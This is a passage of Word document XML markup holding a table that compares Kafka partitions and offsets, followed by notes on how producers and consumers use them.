            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="583C81AF" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="009C74AF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Aspect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24480386" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="009C74AF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Partition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79BBE333" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="009C74AF">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Offset</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="22ED0A10" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27C9A161" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Definition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D40C254" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>A partition is a unit of data storage in Kafka topics.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="386C0448" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>An offset is a unique ID representing a message in a partition.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="1F12E41F" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7AA7BB5C" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FCBB76E" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Enables horizontal scaling and parallel processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1548A5F2" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tracks the position of a consumer in a partition's message log.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="3EF45062" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32C63D5F" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A2D439E" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Each topic can have multiple partitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="358809FF" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Each partition has its own sequence of offsets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="6DB8F835" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DBC83C9" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Replication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04189B1A" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Partitions are replicated across multiple brokers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F02E932" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Offsets are stored within partitions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="0F201F8E" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C16E94F" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ordering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="460176CE" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Messages within a partition are ordered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4137A776" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Offsets maintain the order of messages in a partition.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007149D8" w:rsidRPr="00CE4B95" w14:paraId="408A0A35" w14:textId="77777777" w:rsidTr="007149D8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E673B36" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39578266" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Managed by Kafka for distributing data across brokers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D325F97" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Managed by consumers to keep track of which messages have been consumed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AB671E4" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>How Partition and Offset Work Together:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143BFB1E" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Producer Side</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1D65B8" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Producers send messages to a specific partition in a topic (using a partition key, such as message key). Kafka assigns a partition based on the producer's logic or a round-robin strategy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED42A0B" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Consumer Side</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5DDEE8" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Consumers read messages from partitions. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to determine the position from where the consumer starts reading. Consumers can commit their offsets to Kafka, so they can continue processing from the last consumed message if the consumer is restarted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183D4E50" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="254"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>message order within partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> using the offset but does not guarantee ordering across partitions.</w:t>
      </w:r>
    </w:p>
